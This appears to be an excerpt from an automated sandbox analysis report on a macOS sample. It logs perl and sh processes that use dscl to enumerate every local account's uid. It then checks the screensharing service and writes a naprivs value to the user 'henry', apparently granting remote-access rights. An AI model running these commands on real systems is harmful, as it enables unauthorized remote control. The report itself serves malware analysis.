Source: /usr/bin/perl5.18 (PID: 573)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_devdocs' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 574)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_devicemgr' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 575)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_displaypolicyd' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 576)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_distnote' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 577)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_dovecot' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 578)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_dovenull' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 579)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_dpaudio' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 580)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_eppc' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 581)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_findmydevice' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 582)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_fpsd' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 583)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_ftp' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 584)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_gamecontrollerd' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 585)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_geod' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 586)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_hidd' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 587)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_iconservices' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 588)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_installassistant' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 589)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_installer' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 590)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_jabber' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 591)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_kadmin_admin' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 592)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_kadmin_changepw' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 593)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krb_anonymous' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 594)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krb_changepw' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 595)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krb_kadmin' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 596)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krb_kerberos' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 597)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krb_krbtgt' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 598)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krbfast' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 599)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krbtgt' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 600)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_launchservicesd' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 601)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_lda' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 602)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_locationd' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 603)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_lp' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 604)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_mailman' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 605)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_mbsetupuser' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 606)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_mcxalr' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 607)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_mdnsresponder' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 608)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_mobileasset' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 609)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_mysql' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 610)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_netbios' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 611)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_netstatistics' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 612)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_networkd' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 613)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_nsurlsessiond' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 614)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_nsurlstoraged' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 615)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_ondemand' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 616)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_postfix' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 617)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_postgres' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 618)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_qtss' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 619)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_sandbox' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 620)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_screensaver' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 621)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_scsd' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 622)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_securityagent' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 623)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_serialnumberd' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 624)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_softwareupdate' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 625)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_spotlight' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 626)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_sshd' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 627)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_svn' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 628)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_taskgated' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 629)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_teamsserver' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 630)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_timed' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 631)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_timezone' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 632)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_tokend' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 633)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_trustevaluationagent' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 634)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_unknown' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 635)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_update_sharing' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 636)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_usbmuxd' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 637)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_uucp' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 638)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_warmd' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 639)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_webauthserver' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 640)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_windowserver' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 641)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_www' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 642)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_wwwproxy' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 643)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_xcsbuildagent' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 644)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_xcscredserver' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 645)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_xserverdocs' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 646)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/henry' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 648)Shell command executed: sh -c /bin/launchctl list com.apple.screensharing 2>/dev/nullJump to behavior
Source: /usr/bin/perl5.18 (PID: 665)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/henry' naprivs 2>/dev/nullJump to behavior
Source: /usr/bin/perl5.18 (PID: 667)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -create '/Local/Target/Users/henry' naprivs '1073742079'Jump to behavior
Executes the "dscl" in order to retrieve a list of existing users and/or other user informationShow sources
Source: /bin/sh (PID: 548)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -list /Local/Target/UsersJump to behavior
Source: /bin/sh (PID: 549)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_amavisd uidJump to behavior
Source: /bin/sh (PID: 550)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_analyticsd uidJump to behavior
Source: /bin/sh (PID: 551)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appleevents uidJump to behavior
Source: /bin/sh (PID: 552)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_applepay uidJump to behavior
Source: /bin/sh (PID: 553)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appowner uidJump to behavior
Source: /bin/sh (PID: 554)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appserver uidJump to behavior
Source: /bin/sh (PID: 555)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appstore uidJump to behavior
Source: /bin/sh (PID: 556)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ard uidJump to behavior
Source: /bin/sh (PID: 557)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_assetcache uidJump to behavior
Source: /bin/sh (PID: 558)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_astris uidJump to behavior
Source: /bin/sh (PID: 559)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_atsserver uidJump to behavior
Source: /bin/sh (PID: 560)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_avbdeviced uidJump to behavior
Source: /bin/sh (PID: 561)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_calendar uidJump to behavior
Source: /bin/sh (PID: 562)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_captiveagent uidJump to behavior
Source: /bin/sh (PID: 563)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ces uidJump to behavior
Source: /bin/sh (PID: 564)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_clamav uidJump to behavior
Source: /bin/sh (PID: 565)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cmiodalassistants uidJump to behavior
Source: /bin/sh (PID: 566)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_coreaudiod uidJump to behavior
Source: /bin/sh (PID: 567)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_coremediaiod uidJump to behavior
Source: /bin/sh (PID: 568)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ctkd uidJump to behavior
Source: /bin/sh (PID: 569)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cvmsroot uidJump to behavior
Source: /bin/sh (PID: 570)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cvs uidJump to behavior
Source: /bin/sh (PID: 571)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cyrus uidJump to behavior
Source: /bin/sh (PID: 572)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_datadetectors uidJump to behavior
Source: /bin/sh (PID: 573)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_devdocs uidJump to behavior
Source: /bin/sh (PID: 574)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_devicemgr uidJump to behavior
Source: /bin/sh (PID: 575)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_displaypolicyd uidJump to behavior
Source: /bin/sh (PID: 576)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_distnote uidJump to behavior
Source: /bin/sh (PID: 577)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dovecot uidJump to behavior
Source: /bin/sh (PID: 578)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dovenull uidJump to behavior
Source: /bin/sh (PID: 579)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dpaudio uidJump to behavior
Source: /bin/sh (PID: 580)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_eppc uidJump to behavior
Source: /bin/sh (PID: 581)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_findmydevice uidJump to behavior
Source: /bin/sh (PID: 582)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_fpsd uidJump to behavior
Source: /bin/sh (PID: 583)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ftp uidJump to behavior
Source: /bin/sh (PID: 584)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_gamecontrollerd uidJump to behavior
Source: /bin/sh (PID: 585)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_geod uidJump to behavior
Source: /bin/sh (PID: 586)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_hidd uidJump to behavior
Source: /bin/sh (PID: 587)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_iconservices uidJump to behavior
Source: /bin/sh (PID: 588)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_installassistant uidJump to behavior
Source: /bin/sh (PID: 589)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_installer uidJump to behavior
Source: /bin/sh (PID: 590)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_jabber uidJump to behavior
Source: /bin/sh (PID: 591)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_kadmin_admin uidJump to behavior
Source: /bin/sh (PID: 592)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_kadmin_changepw uidJump to behavior
Source: /bin/sh (PID: 593)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_anonymous uidJump to behavior
Source: /bin/sh (PID: 594)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_changepw uidJump to behavior
Source: /bin/sh (PID: 595)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_kadmin uidJump to behavior
Source: /bin/sh (PID: 596)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_kerberos uidJump to behavior
Source: /bin/sh (PID: 597)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_krbtgt uidJump to behavior
Source: /bin/sh (PID: 598)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krbfast uidJump to behavior
Source: /bin/sh (PID: 599)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krbtgt uidJump to behavior
Source: /bin/sh (PID: 600)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_launchservicesd uidJump to behavior
Source: /bin/sh (PID: 601)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_lda uidJump to behavior
Source: /bin/sh (PID: 602)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_locationd uidJump to behavior
Source: /bin/sh (PID: 603)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_lp uidJump to behavior
Source: /bin/sh (PID: 604)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_mailman uidJump to behavior
Source: /bin/sh (PID: 605)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_mbsetupuser uidJump to behavior
Source: /bin/sh (PID: 606)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_mcxalr uidJump to behavior
Source: /bin/sh (PID: 607)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_mdnsresponder uidJump to behavior
Source: /bin/sh (PID: 608)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_mobileasset uidJump to behavior
Source: /bin/sh (PID: 609)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_mysql uidJump to behavior
Source: /bin/sh (PID: 610)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_netbios uidJump to behavior
Source: /bin/sh (PID: 611)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_netstatistics uidJump to behavior
Source: /bin/sh (PID: 612)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_networkd uidJump to behavior
Source: /bin/sh (PID: 613)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_nsurlsessiond uidJump to behavior
Source: /bin/sh (PID: 614)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_nsurlstoraged uidJump to behavior
Source: /bin/sh (PID: 615)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ondemand uidJump to behavior
Source: /bin/sh (PID: 616)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_postfix uidJump to behavior
Source: /bin/sh (PID: 617)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_postgres uidJump to behavior
Source: /bin/sh (PID: 618)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_qtss uidJump to behavior
Source: /bin/sh (PID: 619)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_sandbox uidJump to behavior
Source: /bin/sh (PID: 620)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_screensaver uidJump to behavior
Source: /bin/sh (PID: 621)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_scsd uidJump to behavior
Source: /bin/sh (PID: 622)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_securityagent uidJump to behavior
Source: /bin/sh (PID: 623)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_serialnumberd uidJump to behavior
Source: /bin/sh (PID: 624)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_softwareupdate uidJump to behavior
Source: /bin/sh (PID: 625)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_spotlight uidJump to behavior
Source: /bin/sh (PID: 626)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_sshd uidJump to behavior
Source: /bin/sh (PID: 627)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_svn uidJump to behavior
Source: /bin/sh (PID: 628)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_taskgated uidJump to behavior
Source: /bin/sh (PID: 629)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_teamsserver uidJump to behavior
Source: /bin/sh (PID: 630)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_timed uidJump to behavior
Source: /bin/sh (PID: 631)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_timezone uidJump to behavior
